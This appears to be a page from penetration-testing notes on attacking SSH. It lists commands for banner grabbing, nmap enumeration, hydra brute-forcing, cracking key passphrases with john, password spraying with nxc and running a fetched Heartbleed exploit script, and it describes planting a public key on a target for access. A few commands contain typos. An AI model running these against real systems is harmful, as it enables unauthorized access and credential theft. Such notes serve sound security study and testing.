TCP: SSH - 22

Connection

ssh <Username>@<Target IP Address> [-p <Port>]

ssh -i <ID_RSA File Name> [-p <Port>] <Username>@<Target IP Address>

NOTE: Make sure id_rsa has permission of 400
chmod 400 <ID_RSA File Name>

Enumeration

Banner Grabbing

nc -vn <Target IP Address> 22

Grab Cert

ssh-keygen -t rsa <Target IP Address> [-p <Port>]

Vulnerability Scanning

ssh-audit -v <Target IP Address>

Nmap

Default Nmap script for SSH

nmap -sC -p <Port> <Target IP Address>

Retrieve version

nmap -sV -p <Port> <Target IP Address>

Retrieve support algorithms

nmap --script ss2-enum-algos -p <Port> <Target IP Address>

Retrieve weak keys

nmap --script ssh-hostkey --script-args ssh_hostkey=full -p <Port> <Target IP Address>

Check authentication method

nmap --script ssh-auth-methods --script-args="ssh.user=root" -p <Port> <Target IP Address>

Bruteforce

Normal Password Bruteforce

hydra -L <Username List> -P <Password List> -s <Port> ssh://<Target IP Address>

hydra -l <Username> -l <Password> -s <Port> ssh://<Target IP Address>

Passphrase Bruteforce

Retrieve passphrase hash from id_rsa

ssh2john id_rsa > ssh.hash

Crack hash

john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash

Password Spraying

nxc ssh <Target IP Address> -u <Username Lists> -p <Password Lists> --continue-on-success

nxc ssh <Target IP Address> -u <Username Lists> -H <Hash Lists> --continue-on-success

Exploit

Heartbleed.py

Github Repo: https://gist.github.com/eelsivart/10174134

curl -O https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py

Modify the following part

def build_heartbeat(tls_ver):
    heartbeat = [
0x18,       # Content Type (Heartbeat)
0x03, tls_ver,  # TLS version
0x00, 0x03,  # Length
# Payload
0x01,       # Type (Request)
0x40, 0x00  # Payload length
    ] 
    return heartbeat

def build_heartbeat(tls_ver):
    heartbeat = [
0x18,       # Content Type (Heartbeat)
0x03, tls_ver,  # TLS version
0x00, 0x03,  # Length
# Payload
0x01,       # Type (Request)
0x10, 0x00  # Payload length
    ] 
    return heartbeat

python heartbleed.py <Target IP Address>

To include Hexdump

python heartbleed.py -x <Target IP Address>

For repeated run

python heartbleed.py -n <Count> <Target OP Address>

Fake user

Generate id_rsa

ssh-keygen -t rsa

Copy the content of id_rsa.pub and paste it in target machine

cat /home/kali/offsec/.ssh/id_rsa.pub

PreviousTCP/UDP: DNS - 53 NextTCP/UDP: LDAP - 389 / 636 / 3268

Last updated 6 months ago